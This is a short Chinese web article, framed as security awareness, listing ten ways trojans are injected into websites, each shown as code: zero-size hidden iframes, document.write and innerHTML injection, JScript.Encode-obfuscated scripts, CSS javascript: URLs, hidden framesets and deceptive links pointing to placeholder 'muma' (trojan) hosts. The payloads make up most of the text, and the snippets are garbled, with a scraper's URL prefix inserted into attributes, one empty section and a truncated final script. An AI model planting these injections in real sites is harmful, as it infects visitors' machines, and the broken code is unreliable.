网络安全|网站被挂马有哪些表现

网络安全|网站被挂马有哪些表现


网站被挂马有哪些表现 , 代码表现
一:框架挂马

<iframe src=https://mparticle.uc.cn/api/地址width=0 height=0>
二:js文件挂马
首先将以下代码
document.write(\"<iframe width='0' height='0' src='https://mparticle.uc.cn/api/地址'></iframe>\");
保存为xxx.js ,
则JS挂马代码为
<script language=javascript src=https://mparticle.uc.cn/api/xxx.js>
三:js变形加密
<SCRIPT language=\"JScript.Encode\" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马
<body ></body>
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\\r\<iframe src=https://mparticle.uc.cn/"http://www.xxx.com/muma.htm/\"></iframe>';
六:css中挂马
body {
background-image: url('javascript:document.write(\"<script src=http://www.XXX.net/muma.js></script>\")')
七:JAJA挂马
<SCRIPT language=javascript>
window.open (\"地址\"\"\"\"toolbar=nolocation=nodirectories=nostatus=nomenubar=noscro llbars=nowidth=1height=1\");
</script>
八:图片伪装
<html>
<iframe src=https://mparticle.uc.cn/"网马地址\" height=0 width=0></iframe>
<img src=https://mparticle.uc.cn/"图片地址\"/>
</html>
九:伪装调用:
<frameset rows=\"4440\" cols=\"*\">
<frame src=https://mparticle.uc.cn/"打开网页\" framborder=\"no\" scrolling=\"auto\" noresize marginwidth=\"0\"margingheight=\"0\">
<frame src=https://mparticle.uc.cn/"木马地址\" frameborder=\"no\" scrolling=\"no\" noresize marginwidth=\"0\"margingheight=\"0\">
</frameset>
十:高级欺骗
<a href=https://mparticle.uc.cn/"http://www.baidu.com(迷惑连接地址 , 显示这个地址指向木马地址)\" >页面要显示的内容</a>
<SCRIPT Language=\"JavaScript\">
function www_baidu_com ()
{
var url=\"网马地址\";
open(url\"NewWindow\"\"toolbar=nolocation=nodirectories=nostatus=nomenubar=noscrollbars=noresizable=nocopyhistory=yeswidth=800height=600left=10top=10\");

【网络安全|网站被挂马有哪些表现】</SCRIPT>